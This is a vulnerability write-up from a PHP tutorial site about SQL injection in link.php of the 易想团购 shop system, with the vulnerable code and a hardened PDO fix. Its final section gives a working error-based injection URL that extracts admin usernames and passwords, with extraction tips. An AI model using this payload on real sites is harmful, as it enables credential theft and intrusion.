好得很程序员自学网


易想购物 link.php SQL injection - Website Security - 自学php

Code in the link.php page of the 易想团购 system:

if($_REQUEST['act']=='go') // link tag: "go" action
{
    // $url is taken straight from the request ($_REQUEST covers GET, POST and cookie values)
    // and concatenated into the SQL string below without any escaping or validation
    $url = ($_REQUEST['url']);
    // the raw value is embedded inside the quoted string literal of the query
    $link_item = $GLOBALS['db']->getRowCached("select * from ".DB_PREFIX."link where (url = '".$url."' or url = 'http://".$url."') and is_effect = 1");
    if($link_item)
    {
        // the id read back from the table is interpolated into a second statement as well
        if(check_ipop_limit(get_client_ip(),"Link",10,$link_item['id']))
            $GLOBALS['db']->query("update ".DB_PREFIX."link set count = count + 1 where id = ".$link_item['id']);
        $url = "http://".$url;
    }
    else
    {
        $url = APP_ROOT."/";
    }
    app_redirect($url);
}
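
A hardened replacement for the act=go branch, written here as an added example; it is not the vendor's code. It assumes $pdo is a PDO handle to the same MySQL database, and that DB_PREFIX, APP_ROOT, check_ipop_limit(), get_client_ip() and app_redirect() are the project's own functions and constants exactly as they appear on this page. The two changes that matter are that the client value is validated against the shape of a plain web link and that it is bound as a parameter, so the statement text is fixed and the database never parses user input as SQL:

```php
<?php
// Added example, not 易想/link.php vendor code: hardened version of the act=go branch.
// Assumed environment: $pdo is a PDO connection; DB_PREFIX, APP_ROOT, check_ipop_limit(),
// get_client_ip() and app_redirect() come from the project, as on the original page.

function resolve_link(PDO $pdo, string $rawUrl): ?array
{
    // Accept only host[:port][/path] with a conservative character set. The table stores
    // plain web links, so quotes, parentheses, spaces and '#' never belong in this value.
    if ($rawUrl === '' || strlen($rawUrl) > 255
        || !preg_match('#^[A-Za-z0-9.\-]+(?::\d{1,5})?(?:/[A-Za-z0-9._~%/?=&\-]*)?$#', $rawUrl)) {
        return null;
    }

    // Bind both candidate values instead of concatenating them into the statement.
    $sql = 'SELECT id, url FROM ' . DB_PREFIX . 'link'
         . ' WHERE (url = :plain OR url = :withScheme) AND is_effect = 1 LIMIT 1';
    $stmt = $pdo->prepare($sql);
    $stmt->execute([':plain' => $rawUrl, ':withScheme' => 'http://' . $rawUrl]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    return $row === false ? null : $row;
}

function bump_link_counter(PDO $pdo, int $id): void
{
    // The original interpolated $link_item['id'] into a second query; bind it as an integer.
    $stmt = $pdo->prepare('UPDATE ' . DB_PREFIX . 'link SET count = count + 1 WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
}

if (($_REQUEST['act'] ?? '') === 'go') {
    $link_item = resolve_link($pdo, (string) ($_REQUEST['url'] ?? ''));
    if ($link_item !== null) {
        if (check_ipop_limit(get_client_ip(), 'Link', 10, (int) $link_item['id'])) {
            bump_link_counter($pdo, (int) $link_item['id']);
        }
        // Redirect to the link as stored in the table rather than to the raw parameter.
        $url = preg_match('#^https?://#i', $link_item['url'])
            ? $link_item['url']
            : 'http://' . $link_item['url'];
    } else {
        $url = APP_ROOT . '/';
    }
    app_redirect($url);
}
```

The validation regex is deliberately strict; if the site stores links with characters outside that set, widen the class rather than drop the check, and keep the prepared statement in any case, since binding alone already prevents the injection. If the project's $GLOBALS['db'] wrapper has no parameter binding, escaping with the driver's own function (mysqli_real_escape_string for a mysqli connection) is the fallback, but it must be applied to every interpolated value, including the id.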

EXP:

http://HdhCmsTestxxx测试数据/link.php?act=go&city=sanming&url=secer') and (updatexml(1,concat(0x3a,(select concat(adm_name,0x3a,adm_password) from jytuan_admin limit 1)),1))%23

How the payload works: the value secer') closes both the quoted string literal and the parenthesised (url = ... or url = ...) group, so the following and (updatexml(...)) clause is evaluated as part of the same WHERE condition. %23 is a URL-encoded #, which starts a MySQL comment and discards the rest of the original statement; it has to be encoded because a literal # in the address bar is a URL fragment and is never sent to the server. updatexml() is handed an XPath expression that begins with a colon, which is invalid, so MySQL aborts with an XPATH syntax error whose message contains the concatenated adm_name and adm_password from the first row of the admin table. Two caveats: the data is only visible if the application echoes the database error into the response, and MySQL truncates the text in that error to 32 characters, so longer values are read in pieces with substr(). The table name jytuan_admin assumes an installation whose DB_PREFIX is jytuan_.
